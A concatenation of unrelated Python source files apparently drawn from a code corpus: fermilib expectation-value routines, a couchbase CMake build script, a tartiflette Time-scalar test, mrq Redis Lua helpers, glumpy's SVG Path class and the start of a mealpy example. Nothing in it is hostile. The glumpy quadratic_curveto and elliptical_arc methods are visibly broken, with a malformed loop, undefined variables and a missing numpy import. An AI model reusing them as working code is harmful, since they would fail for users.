elif state.shape == (sparse_operator.shape[0], 1):
# Handle state vector.
expectation = state.getH() * sparse_operator * state
expectation = expectation[0, 0]
else:
# Handle exception.
raise ValueError('Input state has invalid format.')
# Return.
return expectation
def expectation_computational_basis_state(operator, computational_basis_state):
"""Compute expectation value of operator with a state.
Args:
operator: Qubit or FermionOperator to evaluate expectation value of.
If operator is a FermionOperator, it must be normal-ordered.
computational_basis_state (scipy.sparse vector / list): normalized
computational basis state (if scipy.sparse vector), or list of
occupied orbitals.
Returns:
A real float giving expectation value.
Raises:
TypeError: Incorrect operator or state type.
"""
if isinstance(operator, QubitOperator):
raise NotImplementedError('Not yet implemented for QubitOperators.')
if not isinstance(operator, FermionOperator):
raise TypeError('operator must be a FermionOperator.')
occupied_orbitals = computational_basis_state
if not isinstance(occupied_orbitals, list):
computational_basis_state_index = (
occupied_orbitals.nonzero()[0][0])
occupied_orbitals = [digit == '1' for digit in
bin(computational_basis_state_index)[2:]][::-1]
expectation_value = operator.terms.get((), 0.0)
for i in range(len(occupied_orbitals)):
if occupied_orbitals[i]:
expectation_value += operator.terms.get(
((i, 1), (i, 0)), 0.0)
for j in range(i + 1, len(occupied_orbitals)):
expectation_value -= operator.terms.get(
((j, 1), (i, 1), (j, 0), (i, 0)), 0.0)
return expectation_value
def expectation_db_operator_with_pw_basis_state(
operator, plane_wave_occ_orbitals, n_spatial_orbitals, grid,
spinless):
"""Compute expectation value of a dual basis operator with a plane
wave computational basis state.
Args:
operator: Dual-basis representation of FermionOperator to evaluate
expectation value of. Can have at most 3-body terms.
plane_wave_occ_orbitals (list): list of occupied plane-wave orbitals.
n_spatial_orbitals (int): Number of spatial orbitals.
grid (fermilib.utils.Grid): The grid used for discretization.
spinless (bool): Whether the system is spinless.
Returns:
A real float giving the expectation value.
"""
expectation_value = operator.terms.get((), 0.0)
for single_action, coefficient in iteritems(operator.terms):
if len(single_action) == 2:
expectation_value += coefficient * (
expectation_one_body_db_operator_computational_basis_state(
single_action, plane_wave_occ_orbitals, grid, spinless) /
n_spatial_orbitals)
elif len(single_action) == 4:
expectation_value += coefficient * (
expectation_two_body_db_operator_computational_basis_state(
single_action, plane_wave_occ_orbitals, grid, spinless) /
n_spatial_orbitals ** 2)
elif len(single_action) == 6:
expectation_value += coefficient * (
expectation_three_body_db_operator_computational_basis_state(
single_action, plane_wave_occ_orbitals, grid, spinless) /
n_spatial_orbitals ** 3)
return expectation_value
def expectation_one_body_db_operator_computational_basis_state(
dual_basis_action, plane_wave_occ_orbitals, grid, spinless):
"""Compute expectation value of a 1-body dual-basis operator with a
plane wave computational basis state.
Args:
dual_basis_action: Dual-basis action of FermionOperator to
evaluate expectation value of.
plane_wave_occ_orbitals (list): list of occupied plane-wave orbitals.
grid (fermilib.utils.Grid): The grid used for discretization.
spinless (bool): Whether the system is spinless.
Returns:
A real float giving the expectation value.
"""
expectation_value = 0.0
r_p = position_vector(grid_indices(dual_basis_action[0][0],
grid, spinless), grid)
r_q = position_vector(grid_indices(dual_basis_action[1][0],
grid, spinless), grid)
for orbital in plane_wave_occ_orbitals:
# If there's spin, p and q have to have the same parity (spin),
# and the new orbital has to have the same spin as these.
k_orbital = momentum_vector(grid_indices(orbital,
grid, spinless), grid)
# The Fourier transform is spin-conserving. This means that p, q,
# and the new orbital all have to have the same spin (parity).
if spinless or (dual_basis_action[0][0] % 2 ==
dual_basis_action[1][0] % 2 == orbital % 2):
expectation_value += numpy.exp(-1j * k_orbital.dot(r_p - r_q))
return expectation_value
def expectation_two_body_db_operator_computational_basis_state(
dual_basis_action, plane_wave_occ_orbitals, grid, spinless):
"""Compute expectation value of a 2-body dual-basis operator with a
plane wave computational basis state.
Args:
dual_basis_action: Dual-basis action of FermionOperator to
evaluate expectation value of.
plane_wave_occ_orbitals (list): list of occupied plane-wave orbitals.
grid (fermilib.utils.Grid): The grid used for discretization.
spinless (bool): Whether the system is spinless.
Returns:
A float giving the expectation value.
"""
expectation_value = 0.0
r_a = position_vector(grid_indices(dual_basis_action[0][0],
grid, spinless), grid)
r_b = position_vector(grid_indices(dual_basis_action[1][0],
grid, spinless), grid)
r_c = position_vector(grid_indices(dual_basis_action[2][0],
grid, spinless), grid)
r_d = position_vector(grid_indices(dual_basis_action[3][0],
grid, spinless), grid)
kac_dict = {}
kad_dict = {}
kbc_dict = {}
kbd_dict = {}
for i in plane_wave_occ_orbitals:
k = momentum_vector(grid_indices(i, grid, spinless), grid)
kac_dict[i] = k.dot(r_a - r_c)
kad_dict[i] = k.dot(r_a - r_d)
kbc_dict[i] = k.dot(r_b - r_c)
kbd_dict[i] = k.dot(r_b - r_d)
for orbital1 in plane_wave_occ_orbitals:
k1ac = kac_dict[orbital1]
k1ad = kad_dict[orbital1]
for orbital2 in plane_wave_occ_orbitals:
if orbital1 != orbital2:
k2bc = kbc_dict[orbital2]
k2bd = kbd_dict[orbital2]
# The Fourier transform is spin-conserving. This means that
# the parity of the orbitals involved in the transition must
# be the same.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[3][0] % 2 == orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[2][0] % 2 == orbital2 % 2)):
value = numpy.exp(-1j * (k1ad + k2bc))
# Add because it came from two anti-commutations.
expectation_value += value
# The Fourier transform is spin-conserving. This means that
# the parity of the orbitals involved in the transition must
# be the same.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[2][0] % 2 == orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[3][0] % 2 == orbital2 % 2)):
value = numpy.exp(-1j * (k1ac + k2bd))
# Subtract because it came from a single anti-commutation.
expectation_value -= value
return expectation_value
def expectation_three_body_db_operator_computational_basis_state(
dual_basis_action, plane_wave_occ_orbitals, grid, spinless):
"""Compute expectation value of a 3-body dual-basis operator with a
plane wave computational basis state.
Args:
dual_basis_action: Dual-basis action of FermionOperator to
evaluate expectation value of.
plane_wave_occ_orbitals (list): list of occupied plane-wave orbitals.
grid (fermilib.utils.Grid): The grid used for discretization.
spinless (bool): Whether the system is spinless.
Returns:
A float giving the expectation value.
"""
expectation_value = 0.0
r_a = position_vector(grid_indices(dual_basis_action[0][0],
grid, spinless), grid)
r_b = position_vector(grid_indices(dual_basis_action[1][0],
grid, spinless), grid)
r_c = position_vector(grid_indices(dual_basis_action[2][0],
grid, spinless), grid)
r_d = position_vector(grid_indices(dual_basis_action[3][0],
grid, spinless), grid)
r_e = position_vector(grid_indices(dual_basis_action[4][0],
grid, spinless), grid)
r_f = position_vector(grid_indices(dual_basis_action[5][0],
grid, spinless), grid)
kad_dict = {}
kae_dict = {}
kaf_dict = {}
kbd_dict = {}
kbe_dict = {}
kbf_dict = {}
kcd_dict = {}
kce_dict = {}
kcf_dict = {}
for i in plane_wave_occ_orbitals:
k = momentum_vector(grid_indices(i, grid, spinless), grid)
kad_dict[i] = k.dot(r_a - r_d)
kae_dict[i] = k.dot(r_a - r_e)
kaf_dict[i] = k.dot(r_a - r_f)
kbd_dict[i] = k.dot(r_b - r_d)
kbe_dict[i] = k.dot(r_b - r_e)
kbf_dict[i] = k.dot(r_b - r_f)
kcd_dict[i] = k.dot(r_c - r_d)
kce_dict[i] = k.dot(r_c - r_e)
kcf_dict[i] = k.dot(r_c - r_f)
for orbital1 in plane_wave_occ_orbitals:
k1ad = kad_dict[orbital1]
k1ae = kae_dict[orbital1]
k1af = kaf_dict[orbital1]
for orbital2 in plane_wave_occ_orbitals:
if orbital1 != orbital2:
k2bd = kbd_dict[orbital2]
k2be = kbe_dict[orbital2]
k2bf = kbf_dict[orbital2]
for orbital3 in plane_wave_occ_orbitals:
if orbital1 != orbital3 and orbital2 != orbital3:
k3cd = kcd_dict[orbital3]
k3ce = kce_dict[orbital3]
k3cf = kcf_dict[orbital3]
# Handle \delta_{ad} \delta_{bf} \delta_{ce} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital3 % 2)):
expectation_value += numpy.exp(-1j * (
k1ad + k2bf + k3ce))
# Handle -\delta_{ad} \delta_{be} \delta_{cf} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital3 % 2)):
expectation_value -= numpy.exp(-1j * (
k1ad + k2be + k3cf))
# Handle -\delta_{ae} \delta_{bf} \delta_{cd} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital3 % 2)):
expectation_value -= numpy.exp(-1j * (
k1ae + k2bf + k3cd))
# Handle \delta_{ae} \delta_{bd} \delta_{cf} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital3 % 2)):
expectation_value += numpy.exp(-1j * (
k1ae + k2bd + k3cf))
# Handle \delta_{af} \delta_{be} \delta_{cd} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital3 % 2)):
expectation_value += numpy.exp(-1j * (
k1af + k2be + k3cd))
# Handle -\delta_{af} \delta_{bd} \delta_{ce} after FT.
# The Fourier transform is spin-conserving.
if spinless or (
(dual_basis_action[0][0] % 2 ==
dual_basis_action[5][0] % 2 ==
orbital1 % 2) and
(dual_basis_action[1][0] % 2 ==
dual_basis_action[3][0] % 2 ==
orbital2 % 2) and
(dual_basis_action[2][0] % 2 ==
dual_basis_action[4][0] % 2 ==
orbital3 % 2)):
expectation_value -= numpy.exp(-1j * (
k1af + k2bd + k3ce))
return expectation_value
def get_gap(sparse_operator):
"""Compute gap between lowest eigenvalue and first excited state.
Returns: A real float giving eigenvalue gap.
"""
if not is_hermitian(sparse_operator):
raise ValueError('sparse_operator must be Hermitian.')
values, _ = scipy.sparse.linalg.eigsh(
sparse_operator, 2, which='SA', maxiter=1e7)
gap = abs(values[1] - values[0])
return gap
|
cmake_build.py
|
couchbase/couchbase-python-client
| 189 |
100604
|
<filename>cmake_build.py
#
# Copyright 2019, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os.path
import platform
import re
import subprocess
import sys
from distutils.version import LooseVersion
from setuptools import Extension
from setuptools.command.build_ext import build_ext
import cbuild_config
from gen_config import win_cmake_path
from cbuild_config import couchbase_core, build_type
import logging
import traceback
PYCBC_SSL_FETCH = os.getenv('PYCBC_SSL_FETCH', '')
class CMakeExtension(Extension):
def __init__(self, name, sourcedir='', **kw):
Extension.__init__(self, name, **kw)
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(cbuild_config.CBuildCommon):
hasrun = False
hasbuilt = False
hybrid = False
info = None # type: cbuild_config.CBuildInfo
def run(self):
if not CMakeBuild.hasrun:
out = self.check_for_cmake()
if not out:
raise RuntimeError(
"CMake must be installed to build the following extensions: " +
", ".join(e.name for e in self.extensions))
if platform.system() == "Windows":
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)',
out.decode()).group(1))
if cmake_version < '3.5.1':
raise RuntimeError("CMake >= 3.5.1 is required on Windows")
CMakeBuild.hasrun = True
if CMakeBuild.hybrid:
build_ext.run(self)
for ext in self.extensions:
self.build_extension(ext)
@staticmethod
def check_for_cmake():
try:
return subprocess.check_output(['cmake', '--version'])
except BaseException:
return None
@staticmethod
def requires():
base_req = []
if re.match(r'.*(CONAN|ALL).*', PYCBC_SSL_FETCH):
base_req.append('conan')
if re.match(r'.*(GITHUB_API|ALL).*', PYCBC_SSL_FETCH):
base_req.append('PyGithub')
return base_req + ([] if CMakeBuild.check_for_cmake() else ["cmake"])
def prep_build(self, ext):
if not CMakeBuild.hasbuilt:
from distutils.sysconfig import get_python_inc
import distutils.sysconfig as sysconfig
cfg = self.cfg_type()
extdir = os.path.abspath(
os.path.dirname(self.get_ext_fullpath(ext.name)))
lcb_api_flags = self.get_lcb_api_flags()
cmake_args = lcb_api_flags + ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DPYTHON_EXECUTABLE=' + sys.executable]
cmake_args += ['-DPYTHON_INCLUDE_DIR={}'.format(get_python_inc())]
self.info.setbase(self.build_temp)
self.info.cfg = cfg
from distutils import sysconfig
import os.path as op
v = sysconfig.get_config_vars()
print("LIBDIR {}, LIBPL {}".format(
v.get("LIBDIR"), v.get("LIBPL")))
fpaths = [op.join(v.get(pv, ''), v.get('LDLIBRARY', '')) for pv in ('LIBDIR', 'LIBPL')] + [os.path.normpath(
os.path.join(get_python_inc(), "..", "..", "lib",
"libpython{}.dylib".format('.'.join(map(str, sys.version_info[0:2]))))),
os.path.join(get_python_inc(), "..", "..", "lib")]
python_lib = None
python_libdir = None
for entry in fpaths:
if not op.exists(entry):
print("fpath {} does not exist".format(entry))
continue
try:
print("got fpath {}:".format(entry))
if op.isfile(entry):
print("fpath {} is file, selecting".format(entry))
python_lib = python_lib or entry
continue
else:
entries = os.listdir(entry)
print("fpath {} is directory, contents {}".format(
entry, entries))
for subentry in entries:
fullname = op.normpath(op.join(entry, subentry))
try:
fullname = op.readlink(fullname)
except BaseException:
pass
print("trying subentry:{}".format(fullname))
if op.exists(fullname):
python_lib = python_lib or fullname
python_libdir = op.normpath(entry)
print(
"got match {}, breaking out".format(fullname))
continue
except BaseException:
pass
cmake_args += ['-DHYBRID_BUILD=TRUE'] if CMakeBuild.hybrid else []
cmake_args += ['-DPYTHON_LIBFILE={}'.format(
python_lib)] if python_lib else []
cmake_args += ['-DPYTHON_LIBDIR={}'.format(
python_libdir)] if python_libdir else []
cmake_args += [
'-DPYTHON_VERSION_EXACT={}'.format('.'.join(map(str, sys.version_info[0:2])))] if python_libdir else []
build_args = ['--config', cfg]
if platform.system() == "Windows":
cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(
cfg.upper(),
extdir), '-DLCB_NO_MOCK=1',
'-DCMAKE_BUILD_PARALLEL_LEVEL=1']
if sys.maxsize > 2 ** 32:
cmake_args += ['-A', 'x64']
build_args += ['--', '/m']
else:
cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg.upper()]
build_args += ['--', '-j2']
env = os.environ.copy()
python_executable = win_cmake_path(sys.executable)
pass_path = False
if re.match(r'.*(CONAN|ALL).*', PYCBC_SSL_FETCH):
try:
import conans.conan
env['PATH'] = env['PATH'] + \
";{}".format(os.path.dirname(conans.conan.__file__))
pass_path = True
except BaseException:
logging.warning("Cannot find conan : {}".format(
traceback.format_exc()))
if re.match(r'.*(GITHUB|ALL).*', PYCBC_SSL_FETCH):
pass_path = True
if pass_path:
pathsep = ';' if platform.system().lower().startswith('win') else ':'
env['PYTHONPATH'] = pathsep.join(sys.path)
cmake_args += [
'-DCMAKE_VERBOSE_MAKEFILE:BOOL=ON',
'-DPYTHON_EXECUTABLE={}'.format(python_executable)]
if PYCBC_SSL_FETCH:
cmake_args += ['-DPYCBC_SSL_FETCH={}'.format(PYCBC_SSL_FETCH)]
PYCBC_CMAKE_DEBUG = env.get('PYCBC_CMAKE_DEBUG')
if PYCBC_CMAKE_DEBUG:
cmake_args += [
'--trace-source=CMakeLists.txt',
'--trace-expand']
cxx_compile_args = filter(re.compile(
r'^(?!-std\s*=\s*c(11|99)).*').match, ext.extra_compile_args)
env['CXXFLAGS'] = '{} {} -DVERSION_INFO=\\"{}\\"'.format(
env.get('CXXFLAGS', ''), ' '.join(cxx_compile_args),
self.distribution.get_version())
env['CFLAGS'] = '{} {}'.format(
env.get('CFLAGS', ''), ' '.join(ext.extra_compile_args),
self.distribution.get_version())
print("Launching build with env: {}, build_args: {}, cmake_args: {}".format(
env, build_args, cmake_args))
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, stdout=sys.stdout, stderr=sys.stdout,
cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.'] + build_args,
cwd=self.build_temp)
CMakeBuild.hasbuilt = True
build_dir = os.path.realpath(self.build_lib)
if CMakeBuild.hybrid:
if not self.compiler:
self.run()
for name in self.info.entries():
try:
pkg_build_dir = os.path.join(
build_dir, cbuild_config.couchbase_core)
self.copy_binary_to(cfg, pkg_build_dir,
self.info.lcb_pkgs_srcs(), name)
self.copy_binary_to(
cfg, self.info.pkg_data_dir, self.info.lcb_pkgs_srcs(), name)
except BaseException:
print("failure")
raise
def gen_cmake_build(extoptions, pkgdata):
CMakeBuild.hybrid = build_type in ['CMAKE_HYBRID']
CMakeBuild.setup_build_info(extoptions, pkgdata)
e_mods = [CMakeExtension(
str(couchbase_core + '._libcouchbase'), '', **extoptions)]
return e_mods, CMakeBuild.requires(), cbuild_config.LazyCommandClass(CMakeBuild)
|
tests/unit/scalar/test_time.py
|
matt-koevort/tartiflette
| 530 |
100609
|
import datetime
import pytest
from tartiflette.scalar.builtins.time import ScalarTime
@pytest.mark.parametrize(
"value,should_raise_exception,expected",
[
(None, True, "Time cannot represent value: < None >."),
(True, True, "Time cannot represent value: < True >."),
(False, True, "Time cannot represent value: < False >."),
("", True, "Time cannot represent value: < >."),
(0, True, "Time cannot represent value: < 0 >."),
(1, True, "Time cannot represent value: < 1 >."),
(3, True, "Time cannot represent value: < 3 >."),
(0.0, True, "Time cannot represent value: < 0.0 >."),
(1.0, True, "Time cannot represent value: < 1.0 >."),
(3.0, True, "Time cannot represent value: < 3.0 >."),
(0.1, True, "Time cannot represent value: < 0.1 >."),
(1.1, True, "Time cannot represent value: < 1.1 >."),
(3.1, True, "Time cannot represent value: < 3.1 >."),
("0", True, "Time cannot represent value: < 0 >."),
("1", True, "Time cannot represent value: < 1 >."),
("3", True, "Time cannot represent value: < 3 >."),
("0.0", True, "Time cannot represent value: < 0.0 >."),
("1.0", True, "Time cannot represent value: < 1.0 >."),
("3.0", True, "Time cannot represent value: < 3.0 >."),
("0.1", True, "Time cannot represent value: < 0.1 >."),
("1.1", True, "Time cannot represent value: < 1.1 >."),
("3.1", True, "Time cannot represent value: < 3.1 >."),
("0e0", True, "Time cannot represent value: < 0e0 >."),
("1e0", True, "Time cannot represent value: < 1e0 >."),
("3e0", True, "Time cannot represent value: < 3e0 >."),
("0e1", True, "Time cannot represent value: < 0e1 >."),
("1e1", True, "Time cannot represent value: < 1e1 >."),
("3e1", True, "Time cannot represent value: < 3e1 >."),
("0.1e1", True, "Time cannot represent value: < 0.1e1 >."),
("1.1e1", True, "Time cannot represent value: < 1.1e1 >."),
("3.1e1", True, "Time cannot represent value: < 3.1e1 >."),
("0.11e1", True, "Time cannot represent value: < 0.11e1 >."),
("1.11e1", True, "Time cannot represent value: < 1.11e1 >."),
("3.11e1", True, "Time cannot represent value: < 3.11e1 >."),
(float("inf"), True, "Time cannot represent value: < inf >."),
("A", True, "Time cannot represent value: < A >."),
("{}", True, "Time cannot represent value: < {} >."),
({}, True, "Time cannot represent value: < {} >."),
(Exception("LOL"), True, "Time cannot represent value: < LOL >."),
(
Exception,
True,
"Time cannot represent value: < <class 'Exception'> >.",
),
("15:52:52", True, "Time cannot represent value: < 15:52:52 >."),
(datetime.datetime(1970, 11, 10, 15, 52, 52), False, "15:52:52"),
],
)
def test_scalar_time_coerce_output(value, should_raise_exception, expected):
if should_raise_exception:
with pytest.raises(TypeError, match=expected):
ScalarTime().coerce_output(value)
else:
assert ScalarTime().coerce_output(value) == expected
@pytest.mark.parametrize(
"value,should_raise_exception,expected",
[
(None, True, "Time cannot represent value: < None >."),
(True, True, "Time cannot represent value: < True >."),
(False, True, "Time cannot represent value: < False >."),
("", True, "Time cannot represent value: < >."),
(0, True, "Time cannot represent value: < 0 >."),
(1, True, "Time cannot represent value: < 1 >."),
(3, True, "Time cannot represent value: < 3 >."),
(0.0, True, "Time cannot represent value: < 0.0 >."),
(1.0, True, "Time cannot represent value: < 1.0 >."),
(3.0, True, "Time cannot represent value: < 3.0 >."),
(0.1, True, "Time cannot represent value: < 0.1 >."),
(1.1, True, "Time cannot represent value: < 1.1 >."),
(3.1, True, "Time cannot represent value: < 3.1 >."),
("0", True, "Time cannot represent value: < 0 >."),
("1", True, "Time cannot represent value: < 1 >."),
("3", True, "Time cannot represent value: < 3 >."),
("0.0", True, "Time cannot represent value: < 0.0 >."),
("1.0", True, "Time cannot represent value: < 1.0 >."),
("3.0", True, "Time cannot represent value: < 3.0 >."),
("0.1", True, "Time cannot represent value: < 0.1 >."),
("1.1", True, "Time cannot represent value: < 1.1 >."),
("3.1", True, "Time cannot represent value: < 3.1 >."),
("0e0", True, "Time cannot represent value: < 0e0 >."),
("1e0", True, "Time cannot represent value: < 1e0 >."),
("3e0", True, "Time cannot represent value: < 3e0 >."),
("0e1", True, "Time cannot represent value: < 0e1 >."),
("1e1", True, "Time cannot represent value: < 1e1 >."),
("3e1", True, "Time cannot represent value: < 3e1 >."),
("0.1e1", True, "Time cannot represent value: < 0.1e1 >."),
("1.1e1", True, "Time cannot represent value: < 1.1e1 >."),
("3.1e1", True, "Time cannot represent value: < 3.1e1 >."),
("0.11e1", True, "Time cannot represent value: < 0.11e1 >."),
("1.11e1", True, "Time cannot represent value: < 1.11e1 >."),
("3.11e1", True, "Time cannot represent value: < 3.11e1 >."),
(float("inf"), True, "Time cannot represent value: < inf >."),
("A", True, "Time cannot represent value: < A >."),
("{}", True, "Time cannot represent value: < {} >."),
({}, True, "Time cannot represent value: < {} >."),
(Exception("LOL"), True, "Time cannot represent value: < LOL >."),
(
Exception,
True,
"Time cannot represent value: < <class 'Exception'> >.",
),
("15:52:52", False, datetime.datetime(1900, 1, 1, 15, 52, 52)),
(
datetime.datetime(1970, 11, 10, 15, 52, 52),
True,
"Time cannot represent value: < 1970-11-10 15:52:52 >.",
),
],
)
def test_scalar_time_coerce_input(value, should_raise_exception, expected):
if should_raise_exception:
with pytest.raises(TypeError, match=expected):
ScalarTime().coerce_input(value)
else:
assert ScalarTime().coerce_input(value) == expected
|
mrq/redishelpers.py
|
fredstro/mrq
| 745 |
100624
|
from future.builtins import range
from .utils import memoize
from . import context
def redis_key(name, *args):
prefix = context.get_current_config()["redis_prefix"]
if name == "known_subqueues":
return "%s:ksq:%s" % (prefix, args[0].root_id)
elif name == "queue":
return "%s:q:%s" % (prefix, args[0].id)
elif name == "started_jobs":
return "%s:s:started" % prefix
elif name == "paused_queues":
return "%s:s:paused" % prefix
elif name == "notify":
return "%s:notify:%s" % (prefix, args[0].root_id)
@memoize
def redis_zaddbyscore():
""" Increments multiple keys in a sorted set & returns them """
return context.connections.redis.register_script("""
local zset = KEYS[1]
local min = ARGV[1]
local max = ARGV[2]
local offset = ARGV[3]
local count = ARGV[4]
local score = ARGV[5]
local data = redis.call('zrangebyscore', zset, min, max, 'LIMIT', offset, count)
for i, member in pairs(data) do
redis.call('zadd', zset, score, member)
end
return data
""")
@memoize
def redis_zpopbyscore():
""" Pops multiple keys by score """
return context.connections.redis.register_script("""
local zset = KEYS[1]
local min = ARGV[1]
local max = ARGV[2]
local offset = ARGV[3]
local count = ARGV[4]
local data = redis.call('zrangebyscore', zset, min, max, 'LIMIT', offset, count)
if #data > 0 then
redis.call('zremrangebyrank', zset, 0, #data - 1)
end
return data
""")
@memoize
def redis_lpopsafe():
""" Safe version of LPOP that also adds the key in a "started" zset """
return context.connections.redis.register_script("""
local key = KEYS[1]
local zset_started = KEYS[2]
local count = ARGV[1]
local now = ARGV[2]
local left = ARGV[3]
local data = {}
local current = nil
for i=1, count do
if left == '1' then
current = redis.call('lpop', key)
else
current = redis.call('rpop', key)
end
if current == false then
return data
end
data[i] = current
redis.call('zadd', zset_started, now, current)
end
return data
""")
def redis_group_command(command, cnt, redis_key):
with context.connections.redis.pipeline(transaction=False) as pipe:
for _ in range(cnt):
getattr(pipe, command)(redis_key)
return [x for x in pipe.execute() if x]
|
glumpy/geometry/path.py
|
antoineMoPa/glumpy
| 1,074 |
100662
|
# -----------------------------------------------------------------------------
# Copyright (c) 2009-2016 <NAME>. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
import re
import string
from . import arc, curves
class Path(object):
# ---------------------------------
def __init__(self):
self.vertices = []
self.current = None
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def svg_parse(self, cmd, points):
relative = cmd in string.lowercase
cmd = string.capitalize(cmd)
if cmd == 'M': self.moveto(points,relative)
elif cmd == 'Z': self.close()
elif cmd == 'L': self.lineto(points,relative)
elif cmd == 'H': self.horizontal_lineto(points,relative)
elif cmd == 'V': self.vertical_lineto(points,relative)
elif cmd == 'C': self.curveto(points,relative)
elif cmd == 'Q': self.quadratic_curveto(points,relative)
elif cmd == 'A': self.elliptical_arc(points, relative)
# ---------------------------------
def moveto(self, points, relative = False):
ox,oy = 0,0
if len(self.vertices) and len(self.vertices[-1]) <= 1:
del self.vertices[-1]
self.vertices.append([])
vertices = self.vertices[-1]
x,y = points[:2]
vertices.append( [x+ox,y+oy] )
self.current = x+ox,y+oy
if len(points[2:]):
self.lineto(points[2:], relative)
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def lineto(self, points, relative = False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,0
vertices = self.vertices[-1]
for i in range(0,len(points),2):
x,y = points[i],points[i+1]
vertices.append( [x+ox,y+oy] )
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def horizontal_lineto(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,self.current[1]
vertices = self.vertices[-1]
x = points[-1]
vertices.append( [x+ox,oy] )
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def vertical_lineto(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = self.current[0],0
vertices = self.vertices[-1]
y = points[-1]
vertices.append( [ox,y+oy] )
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def close(self):
vertices = self.vertices[-1]
vertices.append( vertices[0] )
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def curveto(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,0
vertices = self.vertices[-1]
x0, y0 = self.current
for i in range(0,len(points),6):
x1,y1 = points[i+0], points[i+1]
x2,y2 = points[i+2], points[i+3]
self.last_control4 = x2,y2
x3,y3 = points[i+4], points[i+5]
V = curves.curve4_bezier((x0+ox,y0+oy),
(x1+ox,y1+oy),
(x2+ox,y2+oy),
(x3+ox,y3+oy))
vertices.extend(V[1:].tolist())
x0,y0 = vertices[-1]
self.current = vertices[-1]
# ---------------------------------
def quadratic_curveto(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,0
vertices = self.vertices[-1]
x0, y0 = self.current
for i in len(0,range(points),4):
x1,y1 = points[i+0], points[i+1]
self.last_control3 = x1,y1
x2,y2 = points[i+2], points[i+3]
V = curves.curve3_bezier((x0+dx,y0+dy),
(x1+dx,y1+dy),
(x2+dx,y2+dy))
vertices.extend(V[1:].tolist())
x0,y0 = vertices[-1]
self.current = vertices[-1]
# ---------------------------------
def smooth_curveto(self, points, relative=False):
raise NotImplemented
# ---------------------------------
def smooth_quadratic_curveto(self, points, relative=False):
raise NotImplemented
# ---------------------------------
def elliptical_arc(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,0
vertices = self.vertices[-1]
x0, y0 = self.current
for i in range(0,len(points),7):
rx = points[i+0]
ry = points[i+1]
angle = np.pi*points[i+2]/180.
large = points[i+3]
sweep = points[i+4]
x2 = points[i+5]
y2 = points[i+6]
V = arc.elliptical_arc(x0, y0, rx, ry, angle, large, sweep, x2+ox, y2+oy)
vertices.extend(V[1:].tolist())
x0,y0 = vertices[-1]
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
|
examples/utils/visualize/exploration_exploitation_chart.py
|
JokerHB/mealpy
| 162 |
100664
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu" at 11:35, 11/07/2021 %
# %
# Email: <EMAIL> %
# Homepage: https://www.researchgate.net/profile/Nguyen_Thieu2 %
# Github: https://github.com/thieu1995 %
# ------------------------------------------------------------------------------------------------------%
from mealpy.evolutionary_based.GA import BaseGA
from mealpy.utils.visualize import *
from numpy import sum, mean, sqrt
## Define your own fitness function
